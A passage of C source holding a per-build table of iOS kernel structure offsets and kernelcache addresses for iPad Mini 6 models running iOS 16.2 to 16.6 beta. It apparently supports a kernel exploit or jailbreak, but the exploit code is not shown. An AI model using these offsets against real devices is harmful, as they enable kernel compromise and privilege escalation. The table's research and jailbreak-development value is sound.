0xfffffff00a6cb800, .kernelcache__vm_pages = 0xfffffff0078680d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00786a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a6cb7f8, .kernelcache__vn_kqfilter = 0xfffffff007ffd074, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPad14,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a691190, .kernelcache__gPhysBase = 0xfffffff0078b81b0, .kernelcache__gPhysSize = 0xfffffff0078b81b0 + 8, .kernelcache__gVirtBase = 0xfffffff0078b6390, .kernelcache__perfmon_devices = 0xfffffff00a6cc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007fad05c, .kernelcache__ptov_table = 0xfffffff00786b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a6cb800, .kernelcache__vm_pages = 0xfffffff0078680d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00786a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a6cb7f8, .kernelcache__vn_kqfilter = 0xfffffff007ffd074, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E246", .device_id = "iPad14,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a765208, .kernelcache__gPhysBase = 0xfffffff007997fc0, .kernelcache__gPhysSize = 0xfffffff007997fc0 + 8, .kernelcache__gVirtBase = 0xfffffff007996198, .kernelcache__perfmon_devices = 0xfffffff00a7a3520, .kernelcache__perfmon_dev_open = 0xfffffff007fc9210, .kernelcache__ptov_table = 0xfffffff00794b180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a7a2990, .kernelcache__vm_pages = 0xfffffff007947ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00794a130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a7a2988, .kernelcache__vn_kqfilter = 0xfffffff008015ae0, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E252", .device_id = "iPad14,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a765208, .kernelcache__gPhysBase = 0xfffffff007997fc0, .kernelcache__gPhysSize = 0xfffffff007997fc0 + 8, .kernelcache__gVirtBase = 0xfffffff007996198, .kernelcache__perfmon_devices = 0xfffffff00a7a3520, .kernelcache__perfmon_dev_open = 0xfffffff007fc9210, .kernelcache__ptov_table = 0xfffffff00794b180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a7a2990, .kernelcache__vm_pages = 0xfffffff007947ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00794a130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a7a2988, .kernelcache__vn_kqfilter = 0xfffffff008015ae0, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:09:37 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8110", .build_version = "20F66", .device_id = "iPad14,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a76d208, .kernelcache__gPhysBase = 0xfffffff007998100, .kernelcache__gPhysSize = 0xfffffff007998100 + 8, .kernelcache__gVirtBase = 0xfffffff0079962d8, .kernelcache__perfmon_devices = 0xfffffff00a7ab520, .kernelcache__perfmon_dev_open = 0xfffffff007fc9480, .kernelcache__ptov_table = 0xfffffff00794b180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a7aa990, .kernelcache__vm_pages = 0xfffffff007947ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00794a130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a7aa988, .kernelcache__vn_kqfilter = 0xfffffff008015fe8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:16:18 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8110", .build_version = "20G5026e", .device_id = "iPad14,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a819a30, .kernelcache__gPhysBase = 0xfffffff0079b02a8, .kernelcache__gPhysSize = 0xfffffff0079b02a8 + 8, .kernelcache__gVirtBase = 0xfffffff0079ae460, .kernelcache__perfmon_devices = 0xfffffff00a859550, .kernelcache__perfmon_dev_open = 0xfffffff007fedb9c, .kernelcache__ptov_table = 0xfffffff0079639c0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a858910, .kernelcache__vm_pages = 0xfffffff007960110, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007962970, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a858908, .kernelcache__vn_kqfilter = 0xfffffff00803a0b8, }, // iPad Mini 6th Cellular // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:56 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8110", .build_version = "20C65", .device_id = "iPad14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a685190, .kernelcache__gPhysBase = 0xfffffff0078b80c8, .kernelcache__gPhysSize = 0xfffffff0078b80c8 + 8, .kernelcache__gVirtBase = 0xfffffff0078b62a8, .kernelcache__perfmon_devices = 0xfffffff00a6c03b0, .kernelcache__perfmon_dev_open = 0xfffffff007facfa8, .kernelcache__ptov_table = 0xfffffff00786b370, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a6bf800, .kernelcache__vm_pages = 0xfffffff007868098, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00786a330, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a6bf7f8, .kernelcache__vn_kqfilter = 0xfffffff007ffcfd0, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D47", .device_id = "iPad14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a691190, .kernelcache__gPhysBase = 0xfffffff0078b81b0, .kernelcache__gPhysSize = 0xfffffff0078b81b0 + 8, .kernelcache__gVirtBase = 0xfffffff0078b6390, .kernelcache__perfmon_devices = 0xfffffff00a6cc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007fad05c, .kernelcache__ptov_table = 0xfffffff00786b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a6cb800, .kernelcache__vm_pages = 0xfffffff0078680d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00786a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a6cb7f8, .kernelcache__vn_kqfilter = 0xfffffff007ffd074, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8110", .build_version = "20D67", .device_id = "iPad14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a691190, .kernelcache__gPhysBase = 0xfffffff0078b81b0, .kernelcache__gPhysSize = 0xfffffff0078b81b0 + 8, .kernelcache__gVirtBase = 0xfffffff0078b6390, .kernelcache__perfmon_devices = 0xfffffff00a6cc3b0, .kernelcache__perfmon_dev_open = 0xfffffff007fad05c, .kernelcache__ptov_table = 0xfffffff00786b3b0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a6cb800, .kernelcache__vm_pages = 0xfffffff0078680d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00786a370, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a6cb7f8, .kernelcache__vn_kqfilter = 0xfffffff007ffd074, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E246", .device_id = "iPad14,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, 